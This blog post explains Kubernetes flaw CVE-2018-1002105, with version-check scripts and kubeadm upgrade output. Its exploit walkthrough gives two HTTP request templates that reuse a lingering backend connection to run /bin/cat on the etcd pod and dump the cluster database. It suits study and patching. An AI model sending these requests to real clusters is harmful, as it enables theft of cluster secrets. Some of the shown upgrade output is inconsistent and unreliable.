A Light Dive into CVE-2018-1002105

by Anish

Posted on Friday December 7, 2018

Kubernetes v1.10.11, v1.11.5, and v1.12.3 have been released to address CVE-2018-1002105, a critical security issue present in all previous versions of the Kubernetes API Server. The issue is also addressed in the upcoming v1.13.0 release. We recommend all clusters running previous versions update to one of these releases immediately.

Description



With a specially crafted request, users are able to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.
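Here is a simplified way to picture the bug. A proxy should only join the client and backend sockets together after the backend has actually agreed to switch protocols. The Python sketch below models that check. The names `parse_status_code` and `may_tunnel` are hypothetical, and the sketch illustrates the idea behind the fix; it is not the kube-apiserver source, which is written in Go.

```python
HTTP_SWITCHING_PROTOCOLS = 101


def parse_status_code(status_line: str) -> int:
    """Extract the numeric status from a line like 'HTTP/1.1 101 Switching Protocols'."""
    parts = status_line.strip().split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    return int(parts[1])


def may_tunnel(backend_status_line: str) -> bool:
    """Decide whether the proxy may join the client and backend connections.

    Only a 101 response means the backend accepted the upgrade. Any other
    status (for example 400 or 403) should be relayed to the client and the
    backend connection closed, so later bytes from the client are never
    forwarded to the backend on the proxy's own credentials.
    """
    return parse_status_code(backend_status_line) == HTTP_SWITCHING_PROTOCOLS


if __name__ == "__main__":
    for line in ("HTTP/1.1 101 Switching Protocols", "HTTP/1.1 400 Bad Request"):
        print(line, "->", "tunnel" if may_tunnel(line) else "reject and close")
```

Roughly speaking, vulnerable API servers skipped this check. A request that the kubelet rejected could therefore still leave behind an open connection authenticated as the API server.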

Determine the target pods in Kubernetes:

# kubectl get pods

NAME READY STATUS RESTARTS AGE

busybox 1/1 Running 1878 114d

my-nginx-mj7p6 1/1 Running 28017 114d

nginx-64f497f8fd-4tncn 1/1 Running 0 114d

Once you have determined which pod and namespace to target, construct a WebSocket request to that pod's `exec` endpoint and ask the API server for a connection upgrade.

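Packet #1: this request fails with an error, as shown in the diagram. In vulnerable versions, however, the API server leaves its TCP connection to the backend (the kubelet) open.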

GET /api/v1/namespaces/{0}/pods/{1}/exec HTTP/1.1

Host: {2}

Authorization: Bearer {3}

Connection: upgrade

Upgrade: websocket

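Packet #2: because the vulnerable TCP connection is still open, a second request sent over it goes directly to the kubelet, authenticated with the API server's credentials. This allows commands to be executed with elevated privileges.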

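The etcd pod in `kube-system` (here `etcd-kubernetes`) is chosen as the target because an etcd pod is present in most Kubernetes installations. The request below runs `/bin/cat` inside it to dump the etcd database file `/var/lib/etcd/member/snap/db`.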

GET /exec/kube-system/etcd-kubernetes/etcd?command=/bin/cat&command=/var/lib/etcd/member/snap/db&input=1&output=1&tty=0 HTTP/1.1

Upgrade: websocket

Connection: Upgrade

Host: {0}

Origin: http://{0}

Sec-WebSocket-Key: {1}

Sec-WebSocket-Version: 13

sec-websocket-protocol: v4.channel.k8s.io

Affected Kubernetes Versions

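All Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3 are affected: v1.0.x through v1.9.x, v1.10.0 through v1.10.10, v1.11.0 through v1.11.4, and v1.12.0 through v1.12.2.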
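You can check these version ranges programmatically. The Python sketch below uses a hypothetical `is_affected` helper to parse a `GitVersion` string such as `v1.11.0` and compare it against the affected ranges: v1.0.x to v1.9.x, v1.10.0 to v1.10.10, v1.11.0 to v1.11.4, and v1.12.0 to v1.12.2. The sketch assumes plain `vMAJOR.MINOR.PATCH` release strings and ignores pre-release or vendor suffixes such as `-rc.1` or `-gke.N`. Vendors may also have backported the fix, so treat the result as a first pass only.

```python
import re

# First patched patch release on each affected minor line:
# v1.10.11, v1.11.5 and v1.12.3.
FIRST_PATCHED = {10: 11, 11: 5, 12: 3}


def is_affected(git_version: str) -> bool:
    """Return True if an API server GitVersion is affected by CVE-2018-1002105."""
    # Only the leading vMAJOR.MINOR.PATCH is used; any suffix is ignored.
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", git_version)
    if not m or m.group(1) != "1":
        raise ValueError(f"unrecognised Kubernetes version: {git_version!r}")
    minor, patch = int(m.group(2)), int(m.group(3))
    if minor < 10:
        return True  # v1.0.x to v1.9.x received no fix
    if minor in FIRST_PATCHED:
        return patch < FIRST_PATCHED[minor]
    return False  # v1.13.0 and later include the fix


if __name__ == "__main__":
    for v in ("v1.9.7", "v1.10.10", "v1.11.0", "v1.11.5", "v1.12.2", "v1.13.0"):
        print(v, "affected" if is_affected(v) else "not affected")
```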

How do you tell if you are affected?

If you have working kubeconfig (kubectl) credentials, you can download and run a publicly available CVE-2018-1002105 vulnerability checker. Alternatively, compare your API server version with the affected versions listed above.

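How to Determine Your Kubernetes Version

Run `kubectl version` and check the `GitVersion` field on the Server Version line. The flaw is in the API server, so the client version is irrelevant. In the output below, the server runs v1.11.0, which is affected.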

# kubectl version

Client Version: version.Info{Major:"1", Minor:"11", GitVersion:"v1.11.2", GitCommit:"bb9ffb1654d4a729bb4cec18ff088eacc153c239", GitTreeState:"clean", BuildDate:"2018-08-07T23:17:28Z", GoVersion:"go1.10.3", Compiler:"gc", Platform:"linux/amd64"}

Server Version: version.Info{Major:"1", Minor:"11", GitVersion:"v1.11.0", GitCommit:"91e7b4fd31fcd3d5f436da26c980becec37ceefe", GitTreeState:"clean", BuildDate:"2018-06-27T20:08:34Z", GoVersion:"go1.10.2", Compiler:"gc", Platform:"linux/amd64"}
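To script this check, you can extract the Server `GitVersion` from the `kubectl version` output shown above. The Python sketch below assumes the older `version.Info{...}` text format that kubectl printed at the time of this CVE. Newer kubectl releases print a shorter format, and `kubectl version -o json` is a sturdier source where your kubectl supports it. The `git_versions` helper and `SAMPLE` string are illustrative only.

```python
import re

# Matches e.g. 'Server Version: version.Info{Major:"1", ..., GitVersion:"v1.11.0", ...}'
_VERSION_LINE = re.compile(r'^(Client|Server) Version: version\.Info\{.*?GitVersion:"([^"]+)"')

# Abbreviated copy of the output shown above.
SAMPLE = """\
Client Version: version.Info{Major:"1", Minor:"11", GitVersion:"v1.11.2", GitCommit:"bb9ffb1654d4a729bb4cec18ff088eacc153c239", GitTreeState:"clean"}
Server Version: version.Info{Major:"1", Minor:"11", GitVersion:"v1.11.0", GitCommit:"91e7b4fd31fcd3d5f436da26c980becec37ceefe", GitTreeState:"clean"}
"""


def git_versions(kubectl_output: str) -> dict:
    """Map 'Client' and 'Server' to the GitVersion values found in the output."""
    versions = {}
    for line in kubectl_output.splitlines():
        m = _VERSION_LINE.match(line.strip())
        if m:
            versions[m.group(1)] = m.group(2)
    return versions


if __name__ == "__main__":
    print(git_versions(SAMPLE))  # {'Client': 'v1.11.2', 'Server': 'v1.11.0'}
```

To run the sketch against a live cluster, pass it the text returned by `subprocess.run(["kubectl", "version"], capture_output=True, text=True).stdout` (Python 3.7+). Only the Server entry matters for this CVE.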

How to Fix/Remediate the Kubernetes Privilege Escalation Vulnerability

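The recommended way to remediate this issue is to upgrade the control plane to a patched release: v1.10.11, v1.11.5, v1.12.3, or v1.13.0 and later. On kubeadm-managed clusters, use `kubeadm upgrade`.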

Check which versions are available to upgrade to and validate whether your current cluster is upgradeable. To skip the internet check, pass in the optional [version] parameter.

kubeadm upgrade plan [version] [flags]

# kubeadm upgrade plan v1.10.11

[preflight] Running pre-flight checks.

[upgrade] Making sure the cluster is healthy:

[upgrade/config] Making sure the configuration is correct:

[upgrade/config] Reading configuration from the cluster...

[upgrade/config] FYI: You can look at this config file with 'kubectl -n kube-system get cm kubeadm-config -oyaml'

[upgrade] Fetching available versions to upgrade to

[upgrade/versions] Cluster version: v1.11.0

[upgrade/versions] kubeadm version: v1.11.2

Awesome, you're up-to-date! Enjoy!
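Before running `kubeadm upgrade apply`, decide which release you are targeting. The Python sketch below uses a hypothetical `upgrade_target` helper (not a kubeadm feature) to return the first patched release on the cluster's own minor line, or `None` if the cluster already has the fix. It assumes plain `vMAJOR.MINOR.PATCH` strings. Because kubeadm does not support skipping minor versions, the sketch only suggests v1.10.11 as the eventual goal for v1.9 and older.

```python
import re
from typing import Optional

# First patched patch release on each affected minor line.
FIRST_PATCHED = {10: 11, 11: 5, 12: 3}


def upgrade_target(cluster_version: str) -> Optional[str]:
    """Suggest a patched target version, or None if the cluster is already fixed."""
    m = re.match(r"v?1\.(\d+)\.(\d+)", cluster_version)
    if not m:
        raise ValueError(f"unrecognised Kubernetes version: {cluster_version!r}")
    minor, patch = int(m.group(1)), int(m.group(2))
    if minor >= 13:
        return None  # v1.13.0 and later include the fix
    if minor < 10:
        # Eventual goal only: kubeadm upgrades one minor version at a time,
        # so these clusters need intermediate upgrades first.
        return "v1.10.11"
    fixed_patch = FIRST_PATCHED[minor]
    return None if patch >= fixed_patch else f"v1.{minor}.{fixed_patch}"


if __name__ == "__main__":
    target = upgrade_target("v1.11.0")  # cluster version from this article
    if target:
        print(f"kubeadm upgrade apply {target}")  # kubeadm upgrade apply v1.11.5
```

For the v1.11.0 cluster in this article, the sketch suggests v1.11.5 rather than v1.11.2, because v1.11.2 is still affected.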

Upgrade your Kubernetes cluster to the specified version.

# kubeadm upgrade apply [version]

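Complete output of an upgrade to v1.11.2. Note that v1.11.2 is still affected by CVE-2018-1002105. On the 1.11 line, the first patched release is v1.11.5, so in practice run `kubeadm upgrade apply v1.11.5` (or later).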

# kubeadm upgrade apply v1.11.2

[preflight] Running pre-flight checks.

[upgrade] Making sure the cluster is healthy:

[upgrade/config] Making sure the configuration is correct:

[upgrade/config] Reading configuration from the cluster...

[upgrade/config] FYI: You can look at this config file with 'kubectl -n kube-system get cm kubeadm-config -oyaml'

[upgrade/apply] Respecting the --cri-socket flag that is set with higher priority than the config file.

[upgrade/version] You have chosen to change the cluster version to "v1.11.2"

[upgrade/versions] Cluster version: v1.11.0

[upgrade/versions] kubeadm version: v1.11.2

[upgrade/confirm] Are you sure you want to proceed with the upgrade? [y/N]: y

[upgrade/prepull] Will prepull images for components [kube-apiserver kube-controller-manager kube-scheduler etcd]

[upgrade/apply] Upgrading your Static Pod-hosted control plane to version "v1.11.2"...

Static pod: kube-apiserver-kube-master hash: ad20a2a660705a8c9d08878dafffa7ac

Static pod: kube-controller-manager-kube-master hash: feb107be50cab379cdc4e893e129fd2f

Static pod: kube-scheduler-kube-master hash: 31eabaff7d89a40d8f7e05dfc971cdbd

[upgrade/staticpods] Writing new Static Pod manifests to "/etc/kubernetes/tmp/kubeadm-upgraded-manifests112864402"

[controlplane] wrote Static Pod manifest for component kube-apiserver to "/etc/kubernetes/tmp/kubeadm-upgraded-manifests112864402/kube-apiserver.yaml"

[controlplane] wrote Static Pod manifest for component kube-controller-manager to "/etc/kubernetes/tmp/kubeadm-upgraded-manifests112864402/kube-controller-manager.yaml"

[controlplane] wrote Static Pod manifest for component kube-scheduler to "/etc/kubernetes/tmp/kubeadm-upgraded-manifests112864402/kube-scheduler.yaml"

[certificates] Using the existing etcd/ca certificate and key.

[certificates] Using the existing apiserver-etcd-client certificate and key.

[upgrade/staticpods] Moved new manifest to "/etc/kubernetes/manifests/kube-apiserver.yaml" and backed up old manifest to "/etc/kubernetes/tmp/kubeadm-backup-manifests-2018-12-07-13-02-14/kube-apiserver.yaml"

[upgrade/staticpods] Waiting for the kubelet to restart the component

Static pod: kube-apiserver-kube-master hash: ad20a2a660705a8c9d08878dafffa7ac

Static pod: kube-apiserver-kube-master hash: ad20a2a660705a8c9d08878dafffa7ac

Static pod: kube-apiserver-kube-master hash: ad20a2a660705a8c9d08878dafffa7ac

Static pod: kube-apiserver-kube-master hash: 74f3cf345d7cc44651228804635ec24f

[apiclient] Found 1 Pods for label selector component=kube-apiserver

[upgrade/staticpods] Component "kube-apiserver" upgraded successfully!

[upgrade/staticpods] Moved new manifest to "/etc/kubernetes/manifests/kube-controller-manager.yaml" and backed up old manifest to "/etc/kubernetes/tmp/kubeadm-backup-manifests-2018-12-07-13-02-14/kube-controller-manager.yaml"

[upgrade/staticpods] Waiting for the kubelet to restart the component

Static pod: kube-controller-manager-kube-master hash: feb107be50cab379cdc4e893e129fd2f

Static pod: kube-controller-manager-kube-master hash: 3d0475221ca9c7bf15a1f062cc50d547

[apiclient] Found 1 Pods for label selector component=kube-controller-manager

[upgrade/staticpods] Component "kube-controller-manager" upgraded successfully!

[upgrade/staticpods] Moved new manifest to "/etc/kubernetes/manifests/kube-scheduler.yaml" and backed up old manifest to "/etc/kubernetes/tmp/kubeadm-backup-manifests-2018-12-07-13-02-14/kube-scheduler.yaml"

[upgrade/staticpods] Waiting for the kubelet to restart the component

Static pod: kube-scheduler-kube-master hash: 31eabaff7d89a40d8f7e05dfc971cdbd

Static pod: kube-scheduler-kube-master hash: a00c35e56ebd0bdfcd77d53674a5d2a1

[apiclient] Found 1 Pods for label selector component=kube-scheduler

[upgrade/staticpods] Component "kube-scheduler" upgraded successfully!

[uploadconfig] storing the configuration used in ConfigMap "kubeadm-config" in the "kube-system" Namespace

[kubelet] Creating a ConfigMap "kubelet-config-1.11" in namespace kube-system with the configuration for the kubelets in the cluster

[kubelet] Downloading configuration for the kubelet from the "kubelet-config-1.11" ConfigMap in the kube-system namespace

[kubelet] Writing kubelet configuration to file "/var/lib/kubelet/config.yaml"

[patchnode] Uploading the CRI Socket information "/var/run/dockershim.sock" to the Node API object "kube-master" as an annotation

[bootstraptoken] configured RBAC rules to allow Node Bootstrap tokens to post CSRs in order for nodes to get long term certificate credentials

[bootstraptoken] configured RBAC rules to allow the csrapprover controller automatically approve CSRs from a Node Bootstrap Token

[bootstraptoken] configured RBAC rules to allow certificate rotation for all node client certificates in the cluster

[addons] Applied essential addon: CoreDNS

[addons] Applied essential addon: kube-proxy

[upgrade/successful] SUCCESS! Your cluster was upgraded to "v1.11.2". Enjoy!

[upgrade/kubelet] Now that your control plane is upgraded, please proceed with upgrading your kubelets if you haven't already done so.


Thank you for reading! If you found this useful, please share it.
